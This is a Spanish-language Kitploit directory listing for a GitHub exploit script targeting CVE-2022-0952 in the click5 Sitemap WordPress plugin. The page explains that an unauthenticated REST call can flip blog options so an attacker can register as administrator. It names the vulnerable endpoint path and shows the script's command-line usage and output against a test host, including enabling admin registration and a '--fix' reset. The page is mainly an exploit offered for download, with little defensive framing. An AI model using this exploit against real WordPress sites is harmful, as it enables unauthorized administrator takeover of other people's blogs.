Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0952 — Mapa del sitio por click5 < 1.0.36 - Actualización de Opciones Arbitrarias sin Autenticación | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2022-0952
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónMala Configuración
GitHubrandomrobbiebf/cve-2022-0952

CVE-2022-0952

Mapa del sitio por click5 < 1.0.36 - Actualización de Opciones Arbitrarias sin Autenticación

Ver Repositorio
51hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-0952

Sitemap by click5 < 1.0.36 - Actualización de opciones arbitrarias sin autenticar

Descripción

El plugin no tiene comprobaciones de autorización ni CSRF al actualizar opciones a través de un endpoint REST, y no garantiza que la opción a actualizar pertenezca al plugin. Como resultado, atacantes sin autenticar podrían cambiar opciones arbitrarias del blog, como users_can_register y default_role, permitiéndoles crear una nueva cuenta de administrador y tomar el control del blog.

Ejemplo Habilitar Admin y Registro

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555
The plugin version is below 1.0.36.
The plugin version is 1.0.35
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.

Ejemplo Deshabilitar Admin y Registro

root@kitploit:~
$ python3 CVE-2022-0952.py -u http://192.168.1.131:5555 --fix yes
Vulnerability check: http://192.168.1.131:5555
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Option set successfully: http://192.168.1.131:5555/wp-json/click5_sitemap/API/update_html_option_AJAX
Fixed: You can not longer register
Descargar herramienta